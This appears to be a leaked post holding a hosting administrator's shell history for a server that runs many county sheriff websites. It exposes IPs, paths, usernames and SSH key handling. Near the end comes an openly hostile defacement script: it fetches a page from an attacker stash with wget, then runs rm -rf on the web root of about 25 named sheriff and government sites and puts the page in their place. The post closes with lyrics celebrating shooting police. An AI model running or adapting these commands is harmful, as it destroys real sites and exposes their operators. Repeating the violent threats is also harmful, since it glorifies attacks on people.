  4071. ssh 97.74.115.143
  4072. ssh 97.74.115.143
  4073. ssh 97.74.115.143
  4074. cd /var/www/vhosts/
  4075. ls
  4076. cd baxtercountysheriff.com/
  4077. less statistics/logs/access_log
  4078. ls
  4079. find . -ls | less
  4080. find . -ls | less
  4081. less httpsdocs/array_o_files.php
  4082. ll httpsdocs/array_o_files.php
  4083. find . -ls | less
  4084. find . -type f -exec grep passthru {} \;
  4085. find . -type f -exec grep passthru {} \; -print
  4086. find . -ls | less
  4087. find . -ls | mail -s 'Files' [email protected]
  4088. mailq
  4089. vi /etc/postfix/main.cf
  4090. postfix reload
  4091. postqueue -f
  4092. mailq
  4093. mailq
  4094. mailq
  4095. mailq
  4096. mailq
  4097. mailq
  4098. telnet 208.109.80.210 25
  4099. postqueue -f
  4100. ls
  4101. find . -ls | less
  4102. mailq
  4103. less /usr/bin/GET
  4104. less /sbin/ifup
  4105. cd
  4106. ls
  4107. finder.pl /
  4108. cd /var/www/vhosts/
  4109. ls
  4110. cd boonesheriff.com/
  4111. find . -ls | less
  4112. rm -rf cgi-bin/
  4113. find . -ls | less
  4114. less httpdocs/home/check_population.php
  4115. find . -ls | less
  4116. cd httpsdocs/
  4117. ls
  4118. rm -rf test
  4119. cd ../..
  4120. ls
  4121. cd cityofgassville.org/
  4122. find . -ls | less
  4123. cd httpdocs/
  4124. ll
  4125. chmod 755 ajax controllers model settings views
  4126. ll
  4127. find . -ls
  4128. ls
  4129. cd views
  4130. ll
  4131. chmod 755 *
  4132. find . -mode 777
  4133. find . -perms 777
  4134. find . -perm 777
  4135. find . -perm 777 -ls
  4136. find . -perm 777 -type f
  4137. find . -perm 777 -type f -ls
  4138. find . -perm 777 -type f -exec chmod 644 {} \;
  4139. find . -ls
  4140. find . -perm 777 -type d -exec chmod 755 {} \;
  4141. ll
  4142. cd ..
  4143. find . -perm 777 -ls
  4144. ls
  4145. ll
  4146. find . -perm 777 -type d -exec chmod 755 {} \;
  4147. find . -perm 777 -type f -exec chmod 644 {} \;
  4148. ll
  4149. cd ../..
  4150. ll
  4151. cd boonesheriff.com/
  4152. ll
  4153. find . -ls | less
  4154. find . -ls | less
  4155. find . -perm 777
  4156. find . -perm 777 -ls
  4157. cd httpdocs/uploads/
  4158. ll
  4159. find . -perm 777 -ls
  4160. find . -perm 777 -ls -type f
  4161. find . -perm 777 -ls -type f -exec chmod 644 {} \;
  4162. find . -perm 777 -type f -exec chmod 644 {} \;
  4163. find -ls
  4164. cd ..
  4165. cd ..
  4166. find . -perm 777
  4167. find httpdocs -perm 777
  4168. find httpdocs -perm 777 -ls
  4169. chmod 755 httpdocs/admin/modules httpdocs/admin/modules/basic_page_editor
  4170. httpdocs/admin/modules/most_wanted
  4171. httpdocs/admin/modules/most_wanted/wanted_arrested
  4172. httpdocs/admin/modules/press_releases httpdocs/admin/modules/sex_offenders
  4173. httpdocs/config
  4174. chmod 755 httpdocs/high_res httpdocs/images/inmates httpdocs/images/warrants
  4175. httpdocs/uploads
  4176. find httpdocs -perm 777 -ls
  4177. chmod 644 httpdocs/config/injection_patch.php httpdocs/config/header.php
  4178. httpdocs/cross_inmate.php
  4179. cd ..
  4180. ls
  4181. find . -perm 777 -ls
  4182. ls
  4183. cd cityofgassville.org/
  4184. find . -perm 777 -ls
  4185. ;ll
  4186. ll
  4187. cd httpdocs/
  4188. less core/master.tps
  4189. ll
  4190. less core/master.tps
  4191. chmod 777 helpers
  4192. chmod 777 core
  4193. chmod 755 core
  4194. chmod -R 777 core
  4195. chmod -R 777 helpers
  4196. ll
  4197.  
  4198. chmod -R 777 core
  4199. vi phpinfo.php
  4200. rm phpinfo.php
  4201. find core -ls
  4202. less core/ini.tps
  4203. find . sqlite_open
  4204. find . -exec grep sqlite_open {} \;
  4205. yum list | less
  4206. vi phpinfo.php
  4207. rm phpinfo.php
  4208. cd /tmp
  4209. rpm -ivh sqlite2-2.8.17-5.el5.i386.rpm
  4210. service httpd restart
  4211. yum install php-sqlite
  4212. yum install php5-sqlite
  4213. pec install sqlite
  4214. pecl install sqlite
  4215. pecl install sqlite2
  4216. pecl install sqlite3
  4217. pecl info sqlite
  4218. pear install sqlite
  4219. cd
  4220. pecl download sqlite
  4221. mkdir sl
  4222. cd sl/
  4223. tar -zxvf ../SQLite-1.0.3.tgz
  4224. wget http://www.modphp.org/src/sqlite-1.0.3-byref_patch-1.0.patch
  4225. less sqlite-1.0.3-byref_patch-1.0.patch
  4226. patch -p1 < sqlite-1.0.3-byref_patch-1.0.patch
  4227. tar -czf ../SQLite-1.0.3.tgz .
  4228.  
  4229. pecl install SQLite-1.0.3.tgz
  4230. service httpd restart
  4231. vi /etc/php.d/pdo_sqlite.ini
  4232. ll /var/tmp/pear-build-root/SQLite-1.0.3/modules
  4233. cd /etc/php/d
  4234. cd /etc/php.d
  4235. ls
  4236. cp pdo_sqlite.ini sqlite.ini
  4237. vi sqlite.ini
  4238. service httpd restart
  4239. pwd
  4240. cat sqlite.ini
  4241. vi /etc/php.ini
  4242. cd
  4243. cd /var/www//vhosts/cityofgassville.org/
  4244. ls
  4245. cd httpdocs/
  4246. ls
  4247. ll
  4248. less header.tps
  4249. find . -perm 777 -ls
  4250. find . -perm 777 -type f -exec chmod 644 {} \;
  4251. find . -perm 777 -type d -exec chmod 755 {} \;
  4252. ll
  4253. cd ..
  4254. cd ..
  4255. ll
  4256. cd kempercountysheriff.com/
  4257. ls
  4258. ll
  4259. cd http
  4260. cd httpdocs/
  4261. ll
  4262. find . -ls | less
  4263. rm -rf test/
  4264. ll
  4265. find . -ls | less
  4266. ls admin/
  4267. cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess .
  4268. vi .htaccess
  4269. find . -ls | less
  4270. ll
  4271. chown 755 uploads high_res/
  4272. chown apache:apache uploads high_res/
  4273. chmod 1755 uploads high_res/
  4274. ll
  4275. find . -perm 777
  4276. less ./uploads/watermark_wanted_photo.php
  4277. ll ./uploads/watermark_wanted_photo.php
  4278. chmod 644 ./uploads/watermark_wanted_photo.php
  4279. chmod 644 ./uploads/arrested_big.png
  4280. rm -f ./uploads/Thumbs.db
  4281. cd ..
  4282. cd ..
  4283. ll
  4284. cd marioncountysheriffar.com/
  4285. find . -perm 777
  4286. cd httpdocs/
  4287. ll
  4288. ls test
  4289. rm -rf test
  4290. chown apache:apache uploads/ high_res/
  4291. chmod 1755 uploads/ high_res/
  4292. cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess admin/
  4293. vi admin/.htaccess
  4294. ls
  4295. ls ../../boonesheriff.com/httpdocs/admin/
  4296. ll ../../boonesheriff.com/httpdocs/admin/
  4297. cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess
  4298. ../../boonesheriff.com/httpdocs/admin/
  4299. ll -a ../../boonesheriff.com/httpdocs/admin/
  4300. pwd
  4301. find . -ls | less
  4302. rm Thumbs.db
  4303. ll admin/
  4304. ll -a admin/
  4305. cd ../../
  4306. ll
  4307. finder.pl .
  4308. vi ~/bin/finder.pl
  4309. finder.pl .
  4310. vi ~/bin/finder.pl
  4311. finder.pl .
  4312. vi ~/bin/finder.pl
  4313. finder.pl .
  4314. vi ~/bin/finder.pl +16
  4315. finder.pl .
  4316. vi ~/bin/finder.pl +16
  4317. cd baxtercountysheriff.com/
  4318. find . -ls | less
  4319. cd httpdocs/
  4320. ls
  4321. pwd
  4322. ls test
  4323. pwd
  4324. mv test ..
  4325. ls
  4326. ll
  4327. chown apache:apache high_res/ uploads/
  4328. chmod 755 high_res/ uploads/
  4329. ll
  4330. chmod 1755 high_res/ uploads/
  4331. ll
  4332. ll config
  4333. find . -perm 777
  4334. find . -perm 777 -type f
  4335. find . -perm 777 -type f -ls | less
  4336. ll
  4337. ps -ef | grep http
  4338. find . -perm 777 -type f -ls -exec chmod 644 {} \;
  4339. find . -perm 777 -type f -ls -exec chmod 644 {} \;
  4340. ll
  4341. find . -perm 777 -type d
  4342. find . -perm 777 -type d -ls
  4343. find . -perm 777 -type d -ls| less
  4344. find admin -perm 777 -type d -exec chmod 755 {} \;
  4345. find . -perm 777 -type d -ls| less
  4346. find admin_dymin/ -perm 777 -type d -exec chmod 755 {} \;
  4347. find . -perm 777 -type d -ls| less
  4348. find blog config/ -perm 777 -type d -exec chmod 755 {} \;
  4349. find . -perm 777 -type d -ls| less
  4350. find uploads/ -perm 777 -type d -exec chmod 755 {} \;
  4351. ls
  4352. find . -perm 777 -type d -ls| less
  4353. cd images/
  4354. ll
  4355. ls warrants/
  4356. ll warrants/
  4357. ls
  4358. find . -perm 777 -type d -ls
  4359. yum install mcrypt
  4360. yum install php-mcrypt
  4361. service httpd restart
  4362. ll
  4363. chown apache:apache warrants/ inmates/
  4364. chmod 1755 warrants/ inmates/
  4365. ll
  4366. cd
  4367. mv ~bjmsuper/id_dsa.pub .ssh/authorized_keys2
  4368. vi /etc/ssh/sshd_config
  4369. nohup service sshd restart
  4370. cd
  4371. cd .ssh/
  4372. ll
  4373. crontab -e
  4374. /usr/sbin/ntpdate nist1-chi.ustiming.org
  4375. crontab -l
  4376. vi /etc/rsnapshot.exclude
  4377. crontab -e
  4378. /usr/sbin/ntpdate nist1-chi.ustiming.org 2&>1 >/dev/null
  4379. cd
  4380. cd /var/www/vhosts/
  4381. cd marioncountysheriffar.com/
  4382. ll
  4383. cd httpdocs/
  4384. ll
  4385. cd ../../kempercountysheriff.com/
  4386. ll
  4387. cd httpdocs/
  4388. ll
  4389. ll -a admin/
  4390. cd ..
  4391. cd ..
  4392. find . -name .htaccess
  4393. cp ./marioncountysheriffar.com/httpdocs/admin/.htaccess
  4394. kempercountysheriff.com/httpdocs/admin/
  4395. vi kempercountysheriff.com/httpdocs/admin/.htaccess
  4396. cd /var/www/vhosts/baxtercountysheriff.com/cd admin
  4397. cd /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin
  4398. vi .htaccess
  4399. exit
  4400. passwd bjmsuper
  4401. mailq
  4402. openssl s_client -connect mostwantedwebsites.net:993 -ssl2
  4403. openssl s_client -connect localhost.net:993 -ssl2
  4404. openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
  4405. openssl s_client -connect mail.mostwantedwebsites.net:465
  4406. openssl s_client -connect mail.mostwantedwebsites.net:993 -sslv
  4407. openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
  4408. openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
  4409. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4410. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4411. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4412. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4413. ping mail.mostwantedwebsites.net
  4414. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4415. openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
  4416. openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
  4417. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4418. openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
  4419. vi /etc/httpd/conf.d/ssl.conf
  4420. restart httpd
  4421. /etc/init.d/httpd restart
  4422. vi /etc/courier-imap/imapd-ssl
  4423. vi /etc/courier-imap/pop3d-ssl
  4424. /etc/init.d/courier-imap restart
  4425. openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
  4426. openssl s_client -connect mail.mostwantedwebsites.net:465
  4427. openssl s_client -connect mail.mostwantedwebsites.net:25
  4428. add user bcsd_sync
  4429. adduser bcsd_sync
  4430. passwd bcsd_sync
  4431. cd /var/www/vhosts/baxtercountysheriff.com/
  4432. ls
  4433. mkdir home
  4434. ls /home
  4435. ll /home
  4436. rm home
  4437. rm home -rf
  4438. ll
  4439. mv /home/bcsd_sync/ ./home
  4440. ll
  4441. vi /etc/passwd
  4442. chown bcsd_sync:psacln home
  4443. chmod 740 home
  4444. ll
  4445. exit
  4446. cd /var/www/vhosts/adamscosheriff.org/httpdocs/
  4447. ll
  4448. find . -type d -exec chmod 0755 {} \;
  4449. find . -type f -exec chmod 0644 {} \;
  4450. ll
  4451. chown -R apache:apache settings/ uploads/
  4452. ll
  4453. chmod -R 1755 settings/ uploads/
  4454. ll
  4455. cd /var/www/vhosts/sgcso.com/httpdocs/
  4456. ll
  4457. find . -type d -exec chmod 0755 {} \;
  4458. find . -type f -exec chmod 0644 {} \;
  4459. ll
  4460. chown -R apache:apache uploads/ high_res/
  4461. chmod -R 1755 uploads/ high_res/
  4462. ll
  4463. cd admin
  4464. ll
  4465. ll -a
  4466. vi .htaccess
  4467. ll -a
  4468. cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
  4469. ll
  4470. find . -type d -exec chmod 0755 {} \;
  4471. find . -type f -exec chmod 0644 {} \;
  4472. chmod -R 1755 uploads/ high_res/
  4473. chown -R apache:apache uploads/ high_res/
  4474. ll
  4475. cd admin/
  4476. ll
  4477. ll -a
  4478. cd /var/www/vhosts/crosscountysheriff.org/
  4479. cd httpdocs/
  4480. ll
  4481. cd admin/
  4482. ll
  4483. cd config/
  4484. ll
  4485. less connect.php
  4486. vi connect.php
  4487. vi connect.php
  4488. cd /var/www/vhosts/polkcountymosheriff.org/httpdocs/
  4489. ll
  4490. ll
  4491. cd /var/www/vhosts/marioncountysheriffar.com/httpdocs/
  4492. ll
  4493. cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
  4494. ll
  4495.  
  4496.  
  4497. // THIS TIME WE'RE NOT GONNA HESITATE TO PULL THE TRIGGER.
  4498.  
  4499. # wget http://our.sekret.stash/index.html
  4500. # rm -rf /var/www/vhosts/adamscosheriff.org/httpdocs/*; cp index.html
  4501. /var/www/vhosts/adamscosheriff.org/httpdocs/;
  4502. # rm -rf /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/*; cp index.html
  4503. /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/;
  4504. # rm -rf /var/www/vhosts/baxtercountysheriff.com/httpdocs/*; cp index.html
  4505. /var/www/vhosts/baxtercountysheriff.com/httpdocs/;
  4506. # rm -rf /var/www/vhosts/boonesheriff.com/httpdocs/*; cp index.html
  4507. /var/www/vhosts/boonesheriff.com/httpdocs/;
  4508. # rm -rf /var/www/vhosts/cityofgassville.org/httpdocs/*; cp index.html
  4509. /var/www/vhosts/cityofgassville.org/httpdocs/;
  4510. # rm -rf /var/www/vhosts/crosscountysheriff.org/httpdocs/*; cp index.html
  4511. /var/www/vhosts/crosscountysheriff.org/httpdocs/;
  4512. # rm -rf /var/www/vhosts/drewcountysheriff.com/httpdocs/*; cp index.html
  4513. /var/www/vhosts/drewcountysheriff.com/httpdocs/;
  4514. # rm -rf /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/*; cp
  4515. index.html /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/;
  4516. # rm -rf /var/www/vhosts/hodgemansheriff.us/httpdocs/*; cp index.html
  4517. /var/www/vhosts/hodgemansheriff.us/httpdocs/;
  4518. # rm -rf /var/www/vhosts/izardcountyar.org/httpdocs/*; cp index.html
  4519. /var/www/vhosts/izardcountyar.org/httpdocs/;
  4520. # rm -rf /var/www/vhosts/izardcountysheriff.org/httpdocs/*; cp index.html
  4521. /var/www/vhosts/izardcountysheriff.org/httpdocs/;
  4522. # rm -rf /var/www/vhosts/jocomosheriff.org/httpdocs/*; cp index.html
  4523. /var/www/vhosts/jocomosheriff.org/httpdocs/;
  4524. # rm -rf /var/www/vhosts/kempercountysheriff.com/httpdocs/*; cp index.html
  4525. /var/www/vhosts/kempercountysheriff.com/httpdocs/;
  4526. # rm -rf /var/www/vhosts/lawrencecosheriff.com/httpdocs/*; cp index.html
  4527. /var/www/vhosts/lawrencecosheriff.com/httpdocs/;
  4528. # rm -rf /var/www/vhosts/lcsdmo.com/httpdocs/*; cp index.html
  4529. /var/www/vhosts/lcsdmo.com/httpdocs/;
  4530. # rm -rf /var/www/vhosts/marioncountysheriffar.com/httpdocs/*; cp index.html
  4531. /var/www/vhosts/marioncountysheriffar.com/httpdocs/;
  4532. # rm -rf /var/www/vhosts/mcminncountysheriff.com/httpdocs/*; cp index.html
  4533. /var/www/vhosts/mcminncountysheriff.com/httpdocs/;
  4534. # rm -rf /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/*; cp
  4535. index.html /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/;
  4536. # rm -rf /var/www/vhosts/mostwantedwebsites.net/httpdocs/*; cp index.html
  4537. /var/www/vhosts/mostwantedwebsites.net/httpdocs/;
  4538. # rm -rf /var/www/vhosts/newtoncountysheriff.org/httpdocs/*; cp index.html
  4539. /var/www/vhosts/newtoncountysheriff.org/httpdocs/;
  4540. # rm -rf /var/www/vhosts/polkcountymosheriff.org/httpdocs/*; cp index.html
  4541. /var/www/vhosts/polkcountymosheriff.org/httpdocs/;
  4542. # rm -rf /var/www/vhosts/rcpi-ca.org/httpdocs/*; cp index.html
  4543. /var/www/vhosts/rcpi-ca.org/httpdocs/;
  4544. # rm -rf /var/www/vhosts/sgcso.com/httpdocs/*; cp index.html
  4545. /var/www/vhosts/sgcso.com/httpdocs/;
  4546. # rm -rf /var/www/vhosts/stonecountymosheriff.com/httpdocs/*; cp index.html
  4547. /var/www/vhosts/stonecountymosheriff.com/httpdocs/;
  4548. # rm -rf /var/www/vhosts/vbcso.com/httpdocs/*; cp index.html
  4549. /var/www/vhosts/vbcso.com/httpdocs/";
  4550.  
  4551. // I take a left at the light, turn off the headlights and ride real slow
  4552. // Now holla at me when you see the 5-0
  4553. // Alright Dirty, yall boys ready?
  4554. // Bout to turn drive-bys revolutionary
  4555. // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
  4556. // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
  4557. // Look at 'em run, too scared to pull they guns
  4558. // Outta shape from them coffees and them cinnamon buns
  4559. // This shit is fun, how I feel when the tables is turned
  4560. // Hollow tips hit yah flesh through yo vests and it burn
  4561. // That's a lesson you learn, comin straight from the slums
  4562. // And it don't stop till we get full freedom
Add Comment
Please, Sign In to add comment